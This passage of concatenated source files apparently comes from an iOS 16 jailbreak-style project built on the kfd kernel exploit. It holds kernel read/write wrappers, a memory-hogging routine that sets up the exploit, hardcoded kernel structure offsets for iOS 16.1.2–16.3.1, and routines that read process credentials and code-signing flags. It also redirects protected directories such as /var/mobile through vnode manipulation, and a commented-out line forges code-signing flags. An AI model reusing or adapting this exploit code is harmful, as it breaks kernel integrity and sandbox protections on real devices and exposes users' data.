0x%llx", csb_pmap_cs_entry); uint32_t csb_validation_category = kread32(csblobs + off_cs_blob_csb_validation_category); NSLog(@"[i] vnode->ubc_info->cs_blobs->csb_validation_category: 0x%x", csb_validation_category); uint64_t ce_ctx = kread64(csb_pmap_cs_entry + off_pmap_cs_code_directory_ce_ctx); NSLog(@"[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->ce_ctx: 0x%llx", ce_ctx); uint32_t der_entitlements_size = kread32(csb_pmap_cs_entry + off_pmap_cs_code_directory_der_entitlements_size); NSLog(@"[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->der_entitlements_size: 0x%x", der_entitlements_size); uint32_t trust_level = kread32(csb_pmap_cs_entry + off_pmap_cs_code_directory_trust); NSLog(@"[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->trust: 0x%x", trust_level); //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/EntitlementsPriv.h#L21 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/der_vm.h#L33 uint64_t der_start = kread64(ce_ctx + 0x38); NSLog(@"[i] der_start: 0x%llx", der_start); uint64_t der_end = kread64(ce_ctx + 0x20); NSLog(@"[i] der_end: 0x%llx", der_end); uint64_t der_len = der_end - der_start; NSLog(@"[i] der_len: 0x%llx", der_len); CS_GenericBlob der_ents_blob = {0}; kreadbuf(der_start, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); uint32_t der_ents_data_len = der_ents_blob.length; NSLog(@"[i] der_ents_blob.length: 0x%x", convertToLittleEndian(der_ents_data_len)); uint8_t *der_ents_data = malloc(der_len); kreadbuf(der_start + 8, der_ents_data, der_len); uint8_t *us_der_end = der_ents_data + der_len; NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); if(entitlements != nil) { NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); } else { HexDump(der_start, der_len); } free(der_ents_data); return 0; } ================================================ FILE: usprebooter/fun/dir.h ================================================ // // dir.h // PureKFD // // Created by Lrdsnow on 9/2/23. // #ifndef dir_h #define dir_h #import #import uint64_t createFolderAndRedirect2(NSString *path); uint64_t createFolderAndRedirect3(NSString *path); uint64_t createFolderAndRedirectIconsCache(NSString *path); uint64_t createFolderAndRedirectTemp(NSString *path); uint64_t createFolderAndRedirectMobile(); uint64_t createFolderAndRedirectMobileDocs(); void UnRedirectAndRemoveFolder2(uint64_t orig_to_v_data); void UnRedirectAndRemoveFolder3(uint64_t orig_to_v_data); void UnRedirectAndRemoveFolderIconsCache(uint64_t orig_to_v_data); void UnRedirectAndRemoveFolderTemp(uint64_t orig_to_v_data); void UnRedirectAndRemoveFolderMobile(uint64_t orig_to_v_data); void UnRedirectAndRemoveFolderMobileDocs(uint64_t orig_to_v_data); //void createFolder0755(NSString *path, NSString *foldername); //void createFolderUwU(NSString *path, NSString *foldername); #endif /* dir_h */ ================================================ FILE: usprebooter/fun/dir.m ================================================ // // dir.m // PureKFD // // Created by Lrdsnow on 9/2/23. // #import #import #import #import #import #import #include "vnode.h" #import "utils.h" uint64_t createFolderAndRedirectTemp(NSString *path) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/temp"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"%s", path.UTF8String); uint64_t vnode = getVnodeAtPathByChdir(path.UTF8String); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } uint64_t createFolderAndRedirect2(NSString *path) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"%s", path.UTF8String); uint64_t vnode = getVnodeAtPathByChdir(path.UTF8String); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } uint64_t createFolderAndRedirect3(NSString *path) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mount"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"%s", path.UTF8String); uint64_t vnode = getVnodeAtPathByChdir(path.UTF8String); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } uint64_t createFolderAndRedirectIconsCache(NSString *path) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/iconscache"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"%s", path.UTF8String); uint64_t vnode = getVnodeAtPathByChdir(path.UTF8String); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } uint64_t createFolderAndRedirectMobile() { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mobile_mount"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"/var/mobile/"); uint64_t vnode = getVnodeAtPathByChdir("/var/mobile/"); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } uint64_t createFolderAndRedirectMobileDocs() { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mobiledocs_mount"]; [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; NSLog(@"/var/mobile/"); uint64_t vnode = getVnodeAtPathByChdir("/var/mobile/"); NSLog(@"[i] vnode: 0x%llx", vnode); uint64_t orig_to_v_data = -1; if (vnode != -1) { orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); } else { NSLog(@"Failed to get folder vnode"); } return orig_to_v_data; } void UnRedirectAndRemoveFolderMobileDocs(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mobiledocs_mount"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } void UnRedirectAndRemoveFolderMobile(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mobile_mount"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } void UnRedirectAndRemoveFolder2(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } void UnRedirectAndRemoveFolder3(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mount"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } void UnRedirectAndRemoveFolderIconsCache(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/iconscache"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } void UnRedirectAndRemoveFolderTemp(uint64_t orig_to_v_data) { NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/temp"]; funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); NSLog(@"Unredirected"); [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; } ================================================ FILE: usprebooter/fun/fun.h ================================================ // // fun.h // kfd // // Created by Seo Hyun-gyu on 2023/07/25. // #ifndef fun_h #define fun_h #include void fix_exploit(void); #endif /* fun_h */ ================================================ FILE: usprebooter/fun/fun.m ================================================ // // fun.c // kfd // // Created by Seo Hyun-gyu on 2023/07/25. // #include "krw.h" #include "offsets.h" #include #import #import #import #include #include #include #include #include #include "proc.h" #include "vnode.h" //#include "grant_wallpaper_access.h" #include "thanks_opa334dev_htrowii.h" #include "utils.h" #include "cs_blobs.h" //#include "helpers.h" #include "common.h" int funUcred(uint64_t proc) { uint64_t proc_ro = kread64(proc + off_p_proc_ro); uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); uint64_t cr_label = cr_label_pac | base_pac_mask; NSLog(@"[i] self ucred->cr_label: 0x%llx", cr_label); printf("[i] self ucred->cr_label: 0x%llx", cr_label); uint64_t cr_posix_p = ucreds + off_u_cr_posix; NSLog(@"[i] self ucred->posix_cred->cr_uid: %u", kread32(cr_posix_p + off_cr_uid)); NSLog(@"[i] self ucred->posix_cred->cr_ruid: %u", kread32(cr_posix_p + off_cr_ruid)); NSLog(@"[i] self ucred->posix_cred->cr_svuid: %u", kread32(cr_posix_p + off_cr_svuid)); NSLog(@"[i] self ucred->posix_cred->cr_ngroups: %u", kread32(cr_posix_p + off_cr_ngroups)); NSLog(@"[i] self ucred->posix_cred->cr_groups: %u", kread32(cr_posix_p + off_cr_groups)); NSLog(@"[i] self ucred->posix_cred->cr_rgid: %u", kread32(cr_posix_p + off_cr_rgid)); NSLog(@"[i] self ucred->posix_cred->cr_svgid: %u", kread32(cr_posix_p + off_cr_svgid)); NSLog(@"[i] self ucred->posix_cred->cr_gmuid: %u", kread32(cr_posix_p + off_cr_gmuid)); NSLog(@"[i] self ucred->posix_cred->cr_flags: %u", kread32(cr_posix_p + off_cr_flags)); // printf("[i] self ucred->posix_cred->cr_uid: %u\n", kread32(cr_posix_p + off_cr_uid)); // printf("[i] self ucred->posix_cred->cr_ruid: %u\n", kread32(cr_posix_p + off_cr_ruid)); // printf("[i] self ucred->posix_cred->cr_svuid: %u\n", kread32(cr_posix_p + off_cr_svuid)); // printf("[i] self ucred->posix_cred->cr_ngroups: %u\n", kread32(cr_posix_p + off_cr_ngroups)); // printf("[i] self ucred->posix_cred->cr_groups: %u\n", kread32(cr_posix_p + off_cr_groups)); // printf("[i] self ucred->posix_cred->cr_rgid: %u\n", kread32(cr_posix_p + off_cr_rgid)); // printf("[i] self ucred->posix_cred->cr_svgid: %u\n", kread32(cr_posix_p + off_cr_svgid)); // printf("[i] self ucred->posix_cred->cr_gmuid: %u\n", kread32(cr_posix_p + off_cr_gmuid)); // printf("[i] self ucred->posix_cred->cr_flags: %u\n", kread32(cr_posix_p + off_cr_flags)); return 0; } int funCSFlags(char* process) { pid_t pid = getPidByName(process); uint64_t proc = getProc(pid); uint64_t proc_ro = kread64(proc + off_p_proc_ro); uint32_t csflags = kread32(proc_ro + off_p_ro_p_csflags); NSLog(@"[i] %s proc->proc_ro->p_csflags: 0x%x", process, csflags); // printf("[i] %s proc->proc_ro->p_csflags: 0x%x\n", process, csflags); #define TF_PLATFORM 0x400 #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ #define CS_INSTALLER 0x0000008 /* has installer entitlement */ #define CS_HARD 0x0000100 /* don't load invalid pages */ #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ #define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */ // csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL); // sleep(3); // kwrite32(proc_ro + off_p_ro_p_csflags, csflags); return 0; } int funTask(char* process) { pid_t pid = getPidByName(process); uint64_t proc = getProc(pid); NSLog(@"[i] %s proc: 0x%llx", process, proc); // printf("[i] %s proc: 0x%llx\n", process, proc); uint64_t proc_ro = kread64(proc + off_p_proc_ro); uint64_t pr_proc = kread64(proc_ro + off_p_ro_pr_proc); NSLog(@"[i] %s proc->proc_ro->pr_proc: 0x%llx", process, pr_proc); // printf("[i] %s proc->proc_ro->pr_proc: 0x%llx\n", process, pr_proc); uint64_t pr_task = kread64(proc_ro + off_p_ro_pr_task); NSLog(@"[i] %s proc->proc_ro->pr_task: 0x%llx", process, pr_task); // printf("[i] %s proc->proc_ro->pr_task: 0x%llx\n", process, pr_task); uint32_t t_flags = kread32(pr_task + off_task_t_flags); NSLog(@"[i] %s task->t_flags: 0x%x", process, t_flags); // printf("[i] %s task->t_flags: 0x%x\n", process, t_flags); /* * RO-protected flags: */ #define TFRO_PLATFORM 0x00000400 /* task is a platform binary */ #define TFRO_FILTER_MSG 0x00004000 /* task calls into message filter callback before sending a message */ #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */ #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */ uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); NSLog(@"[i] %s proc->proc_ro->t_flags_ro: 0x%x", process, t_flags_ro); // printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); return 0; } void fix_exploit(void) { printf("[*] Exploit fixup"); _offsets_init(); pid_t myPid = getpid(); uint64_t selfProc = getProc(myPid); funUcred(selfProc); } ================================================ FILE: usprebooter/fun/krw.c ================================================ // // krw.c // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include "krw.h" #include "libkfd.h" //#include "helpers.h" #include #include #include "memoryControl.h" //#include "memoryControl.h" uint64_t _kfd = 0; void NSLog(CFStringRef, ...); __attribute__ ((optnone)) uint64_t do_kopen(uint64_t puaf_pages, uint64_t puaf_method, uint64_t kread_method, uint64_t kwrite_method, size_t headroom, bool use_headroom) { if (use_headroom) { size_t STATIC_HEADROOM = (headroom * (size_t)1024 * (size_t)1024); uint64_t* memory_hog = NULL; size_t pagesize = sysconf(_SC_PAGESIZE); size_t memory_avail = os_proc_available_memory(); size_t hog_headroom = STATIC_HEADROOM + puaf_pages * pagesize; size_t memory_to_hog = memory_avail > hog_headroom ? memory_avail - hog_headroom: 0; int32_t old_memory_limit = 0; memorystatus_memlimit_properties2_t mmprops; NSLog(CFSTR("[memoryHogger] memory_avail = %zu"), memory_avail); printf("[memoryHogger] memory_avail = %zu\n", memory_avail); NSLog(CFSTR("[memoryHogger] hog_headroom = %zu"), hog_headroom); printf("[memoryHogger] hog_headroom = %zu\n", hog_headroom); NSLog(CFSTR("[memoryHogger] memory_to_hog = %zu"), memory_to_hog); printf("[memoryHogger] memory_to_hog = %zu\n", memory_to_hog); if (hasEntitlement(CFSTR("com.apple.private.memorystatus"))) { uint32_t new_memory_limit = (uint32_t)(getPhysicalMemorySize() / UINT64_C(1048576)) * 2; int ret = memorystatus_control(MEMORYSTATUS_CMD_GET_MEMLIMIT_PROPERTIES, getpid(), 0, &mmprops, sizeof(mmprops)); if (ret == 0) { NSLog(CFSTR("[memoryHogger] current memory limit: %zu MiB"), mmprops.v1.memlimit_active); printf("[memoryHogger] current memory limit: %d MiB\n", mmprops.v1.memlimit_active); old_memory_limit = mmprops.v1.memlimit_active; ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_TASK_LIMIT, getpid(), new_memory_limit, NULL, 0); if (ret == 0) { NSLog(CFSTR("[memoryHogger] The memory limit for pid %d has been set to %u MiB successfully"), getpid(), new_memory_limit); printf("[memoryHogger] The memory limit for pid %d has been set to %u MiB successfully\n", getpid(), new_memory_limit); } else { NSLog(CFSTR("[memoryHogger] Failed to set memory limit: %d (%s)"), errno, strerror(errno)); printf("[memoryHogger] Failed to set memory limit: %d (%s)\n", errno, strerror(errno)); } } else { NSLog(CFSTR("[memoryHogger] could not get current memory limits")); printf("[memoryHogger] could not get current memory limits\n"); } } if (memory_avail > hog_headroom) { memory_hog = malloc(memory_to_hog); if (memory_hog != NULL) { for (uint64_t i = 0; i < memory_to_hog / sizeof(uint64_t); i++) { memory_hog[i] = 0x4141414141414141; } } NSLog(CFSTR("[memoryHogger] Filled up hogged memory with A's")); printf("[memoryHogger] Filled up hogged memory with A's\n"); } else { NSLog(CFSTR("[memoryHogger] Did not hog memory because there is too little free memory")); printf("[memoryHogger] Did not hog memory because there is too little free memory\n"); } printf("[*] Performing kopen"); _kfd = kopen(puaf_pages, puaf_method, kread_method, kwrite_method); if (memory_hog) free(memory_hog); if (old_memory_limit) { // set the limit back because it affects os_proc_available_memory int ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_TASK_LIMIT, getpid(), old_memory_limit, NULL, 0); if (ret == 0) { NSLog(CFSTR("[memoryHogger] The memory limit for pid %d has been set to %u MiB successfully"), getpid(), old_memory_limit); printf("[memoryHogger] The memory limit for pid %d has been set to %u MiB successfully\n", getpid(), old_memory_limit); } else { NSLog(CFSTR("[memoryHogger] Failed to set memory limit: %d (%s)"), errno, strerror(errno)); printf("[memoryHogger] Failed to set memory limit: %d (%s)\n", errno, strerror(errno)); } } } else { _kfd = kopen(puaf_pages, puaf_method, kread_method, kwrite_method); } return _kfd; } void do_kclose(void) { printf("[*] Performing kclose"); kclose((struct kfd*)(_kfd)); } void do_kread(u64 kaddr, void* uaddr, u64 size) { kread(_kfd, kaddr, uaddr, size); } void do_kwrite(void* uaddr, u64 kaddr, u64 size) { kwrite(_kfd, uaddr, kaddr, size); } uint64_t get_kslide(void) { return ((struct kfd*)_kfd)->perf.kernel_slide; } uint64_t get_kernproc(void) { return ((struct kfd*)_kfd)->info.kaddr.kernel_proc; } uint8_t kread8(uint64_t where) { uint8_t out; kread(_kfd, where, &out, sizeof(uint8_t)); return out; } uint32_t kread16(uint64_t where) { uint16_t out; kread(_kfd, where, &out, sizeof(uint16_t)); return out; } uint32_t kread32(uint64_t where) { uint32_t out; kread(_kfd, where, &out, sizeof(uint32_t)); return out; } uint64_t kread64(uint64_t where) { uint64_t out; kread(_kfd, where, &out, sizeof(uint64_t)); return out; } //Thanks @jmpews uint64_t kread64_smr(uint64_t where) { uint64_t value = kread64(where) | base_pac_mask; if((value & 0x400000000000) != 0) value &= 0xFFFFFFFFFFFFFFE0; return value; } void kwrite8(uint64_t where, uint8_t what) { uint8_t _buf[8] = {}; _buf[0] = what; _buf[1] = kread8(where+1); _buf[2] = kread8(where+2); _buf[3] = kread8(where+3); _buf[4] = kread8(where+4); _buf[5] = kread8(where+5); _buf[6] = kread8(where+6); _buf[7] = kread8(where+7); kwrite((u64)(_kfd), &_buf, where, sizeof(u64)); } void kwrite16(uint64_t where, uint16_t what) { u16 _buf[4] = {}; _buf[0] = what; _buf[1] = kread16(where+2); _buf[2] = kread16(where+4); _buf[3] = kread16(where+6); kwrite((u64)(_kfd), &_buf, where, sizeof(u64)); } void kwrite32(uint64_t where, uint32_t what) { u32 _buf[2] = {}; _buf[0] = what; _buf[1] = kread32(where+4); kwrite((u64)(_kfd), &_buf, where, sizeof(u64)); } void kwrite64(uint64_t where, uint64_t what) { u64 _buf[1] = {}; _buf[0] = what; kwrite((u64)(_kfd), &_buf, where, sizeof(u64)); } ================================================ FILE: usprebooter/fun/krw.h ================================================ // // krw.h // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #ifndef krw_h #define krw_h #include #include #include "fun.h" uint64_t do_kopen(uint64_t puaf_pages, uint64_t puaf_method, uint64_t kread_method, uint64_t kwrite_method, size_t headroom, bool use_headroom); void do_kclose(void); void do_kread(uint64_t kaddr, void* uaddr, uint64_t size); void do_kwrite(void* uaddr, uint64_t kaddr, uint64_t size); uint64_t get_kslide(void); uint64_t get_kernproc(void); uint8_t kread8(uint64_t where); uint32_t kread16(uint64_t where); uint32_t kread32(uint64_t where); uint64_t kread64(uint64_t where); uint64_t kread64_smr(uint64_t where); void kwrite8(uint64_t where, uint8_t what); void kwrite16(uint64_t where, uint16_t what); void kwrite32(uint64_t where, uint32_t what); void kwrite64(uint64_t where, uint64_t what); #endif /* krw_h */ ================================================ FILE: usprebooter/fun/offsets.h ================================================ // // offsets.h // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include extern uint32_t off_p_list_le_prev; extern uint32_t off_p_proc_ro; extern uint32_t off_p_ppid; extern uint32_t off_p_original_ppid; extern uint32_t off_p_pgrpid; extern uint32_t off_p_uid; extern uint32_t off_p_gid; extern uint32_t off_p_ruid; extern uint32_t off_p_rgid; extern uint32_t off_p_svuid; extern uint32_t off_p_svgid; extern uint32_t off_p_sessionid; extern uint32_t off_p_puniqueid; extern uint32_t off_p_pid; extern uint32_t off_p_pfd; extern uint32_t off_p_textvp; extern uint32_t off_p_name; extern uint32_t off_p_ro_p_csflags; extern uint32_t off_p_ro_p_ucred; extern uint32_t off_p_ro_pr_proc; extern uint32_t off_p_ro_pr_task; extern uint32_t off_p_ro_t_flags_ro; extern uint32_t off_u_cr_label; extern uint32_t off_u_cr_posix; extern uint32_t off_cr_uid; extern uint32_t off_cr_ruid; extern uint32_t off_cr_svuid; extern uint32_t off_cr_ngroups; extern uint32_t off_cr_groups; extern uint32_t off_cr_rgid; extern uint32_t off_cr_svgid; extern uint32_t off_cr_gmuid; extern uint32_t off_cr_flags; extern uint32_t off_task_t_flags; extern uint32_t off_task_itk_space; extern uint32_t off_fd_ofiles; extern uint32_t off_fd_cdir; extern uint32_t off_fp_glob; extern uint32_t off_fg_data; extern uint32_t off_fg_flag; extern uint32_t off_vnode_v_ncchildren_tqh_first; extern uint32_t off_vnode_v_iocount; extern uint32_t off_vnode_v_usecount; extern uint32_t off_vnode_v_flag; extern uint32_t off_vnode_v_name; extern uint32_t off_vnode_v_mount; extern uint32_t off_vnode_v_data; extern uint32_t off_vnode_v_kusecount; extern uint32_t off_vnode_v_references; extern uint32_t off_vnode_v_lflag; extern uint32_t off_vnode_v_owner; extern uint32_t off_vnode_v_parent; extern uint32_t off_vnode_v_label; extern uint32_t off_vnode_v_cred; extern uint32_t off_vnode_v_writecount; extern uint32_t off_vnode_v_type; extern uint32_t off_vnode_vu_ubcinfo; extern uint32_t off_mount_mnt_data; extern uint32_t off_mount_mnt_fsowner; extern uint32_t off_mount_mnt_fsgroup; extern uint32_t off_mount_mnt_devvp; extern uint32_t off_mount_mnt_flag; extern uint32_t off_specinfo_si_flags; extern uint32_t off_namecache_nc_vp; extern uint32_t off_namecache_nc_child_tqe_prev; extern uint32_t off_ipc_space_is_table; extern uint32_t off_ubc_info_cs_blobs; extern uint32_t off_ubc_info_cs_add_gen; extern uint32_t off_cs_blob_csb_pmap_cs_entry; extern uint32_t off_cs_blob_csb_cdhash; extern uint32_t off_cs_blob_csb_flags; extern uint32_t off_cs_blob_csb_teamid; extern uint32_t off_cs_blob_csb_validation_category; extern uint32_t off_pmap_cs_code_directory_ce_ctx; extern uint32_t off_pmap_cs_code_directory_der_entitlements_size; extern uint32_t off_pmap_cs_code_directory_trust; extern uint32_t off_ipc_entry_ie_object; extern uint32_t off_ipc_object_io_bits; extern uint32_t off_ipc_object_io_references; extern uint32_t off_ipc_port_ip_kobject; void _offsets_init(void); ================================================ FILE: usprebooter/fun/offsets.m ================================================ // // offsets.c // kfd // // Created by Seo Hyun-gyu on 2023/07/29. // #include "offsets.h" #include #include uint32_t off_p_list_le_prev = 0; uint32_t off_p_proc_ro = 0; uint32_t off_p_ppid = 0; uint32_t off_p_original_ppid = 0; uint32_t off_p_pgrpid = 0; uint32_t off_p_uid = 0; uint32_t off_p_gid = 0; uint32_t off_p_ruid = 0; uint32_t off_p_rgid = 0; uint32_t off_p_svuid = 0; uint32_t off_p_svgid = 0; uint32_t off_p_sessionid = 0; uint32_t off_p_puniqueid = 0; uint32_t off_p_pid = 0; uint32_t off_p_pfd = 0; uint32_t off_p_textvp = 0; uint32_t off_p_name = 0; uint32_t off_p_ro_p_csflags = 0; uint32_t off_p_ro_p_ucred = 0; uint32_t off_p_ro_pr_proc = 0; uint32_t off_p_ro_pr_task = 0; uint32_t off_p_ro_t_flags_ro = 0; uint32_t off_u_cr_label = 0; uint32_t off_u_cr_posix = 0; uint32_t off_cr_uid = 0; uint32_t off_cr_ruid = 0; uint32_t off_cr_svuid = 0; uint32_t off_cr_ngroups = 0; uint32_t off_cr_groups = 0; uint32_t off_cr_rgid = 0; uint32_t off_cr_svgid = 0; uint32_t off_cr_gmuid = 0; uint32_t off_cr_flags = 0; uint32_t off_task_t_flags = 0; uint32_t off_fd_ofiles = 0; uint32_t off_fd_cdir = 0; uint32_t off_fp_glob = 0; uint32_t off_fg_data = 0; uint32_t off_fg_flag = 0; uint32_t off_vnode_v_ncchildren_tqh_first = 0; uint32_t off_vnode_v_iocount = 0; uint32_t off_vnode_v_usecount = 0; uint32_t off_vnode_v_flag = 0; uint32_t off_vnode_v_name = 0; uint32_t off_vnode_v_mount = 0; uint32_t off_vnode_v_data = 0; uint32_t off_vnode_v_kusecount = 0; uint32_t off_vnode_v_references = 0; uint32_t off_vnode_v_parent = 0; uint32_t off_vnode_v_label = 0; uint32_t off_vnode_v_cred = 0; uint32_t off_vnode_v_writecount = 0; uint32_t off_vnode_v_type = 0; uint32_t off_mount_mnt_data = 0; uint32_t off_mount_mnt_fsowner = 0; uint32_t off_mount_mnt_fsgroup = 0; uint32_t off_mount_mnt_devvp = 0; uint32_t off_mount_mnt_flag = 0; uint32_t off_specinfo_si_flags = 0; uint32_t off_namecache_nc_vp = 0; uint32_t off_namecache_nc_child_tqe_prev = 0; #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame) void _offsets_init(void) { if(SYSTEM_VERSION_EQUAL_TO(@"16.1.2")||SYSTEM_VERSION_EQUAL_TO(@"16.2")||SYSTEM_VERSION_EQUAL_TO(@"16.3")||SYSTEM_VERSION_EQUAL_TO(@"16.3.1")) { NSLog(@"[i] offsets selected for iOS 16.1.2"); //iPhone 14 Pro 16.1.2 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; off_p_ppid = 0x20; off_p_original_ppid = 0x24; off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; off_p_sessionid = 0x44; off_p_puniqueid = 0x48; off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x350; off_p_name = 0x381; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 off_p_ro_p_csflags = 0x1c; off_p_ro_p_ucred = 0x20; off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ucred.h#L91 off_u_cr_label = 0x78; off_u_cr_posix = 0x18; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ucred.h#L100 off_cr_uid = 0; off_cr_ruid = 0x4; off_cr_svuid = 0x8; off_cr_ngroups = 0xc; off_cr_groups = 0x10; off_cr_rgid = 0x50; off_cr_svgid = 0x54; off_cr_gmuid = 0x58; off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 off_task_t_flags = 0x3D0; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 off_fp_glob = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L179 off_fg_data = 0x38; off_fg_flag = 0x10; 